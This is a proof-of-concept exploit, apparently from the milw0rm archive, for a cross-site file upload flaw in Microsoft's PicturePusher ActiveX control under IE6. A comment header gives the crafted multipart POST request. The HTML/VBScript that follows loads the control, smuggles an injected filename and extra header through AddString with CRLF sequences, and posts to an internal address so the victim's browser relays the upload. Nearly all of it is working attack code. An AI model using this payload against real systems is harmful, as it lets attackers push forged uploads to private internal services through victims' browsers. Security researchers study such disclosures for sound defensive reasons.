53 lines
No EOL
1.7 KiB
HTML
53 lines
No EOL
1.7 KiB
HTML
<!--
|
|
Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File
|
|
Upload attack POC (IE6)
|
|
by Nine:Situations:Group::pyrokinesis
|
|
|
|
bug discovered by rgod during early March 2008
|
|
|
|
tested software: Microsoft Digital Image 2006 Starter Edition
|
|
works fine against IE6, with some warnings with IE7
|
|
|
|
dll settings:
|
|
RegKey Safe for Script: False
|
|
RegKey Safe for Init: False
|
|
Implements IObjectSafety: True
|
|
IDisp Safe: Safe for untrusted: caller,data
|
|
|
|
This control allows to build highly customized POST requests against private
|
|
upload facilities, using the browser as a proxy to bounce them and by injecting
|
|
a filename sub-field through ex. the AddString() method
|
|
|
|
The magic packet :
|
|
|
|
POST /?aaaa=1 HTTP/1.1
|
|
Content-Type: multipart/form-data; boundary=---------------------------
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
|
|
Host: 127.0.0.1
|
|
Content-Length: 181
|
|
Cache-Control: no-cache
|
|
|
|
-----------------------------
|
|
Content-Disposition: form-data; name="aaaa"; filename="suntzu.test"
|
|
Content-Type: text/plain; AAAA: ""
|
|
|
|
xxxxxxxx
|
|
-------------------------------
|
|
|
|
-->
|
|
<HTML>
|
|
<OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' />
|
|
</OBJECT>
|
|
<script language='vbscript'>
|
|
'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1"
|
|
PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1"
|
|
PicturePusherControl.AddSeperator
|
|
CRLF = unescape("%0d%0a")
|
|
FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """
|
|
Value="xxxxxxxx"
|
|
'for some reason cannot do this with AddFile() method, however...
|
|
PicturePusherControl.AddString FormElementName ,Value
|
|
PicturePusherControl.Post
|
|
</script>
|
|
|
|
# milw0rm.com [2008-10-08] |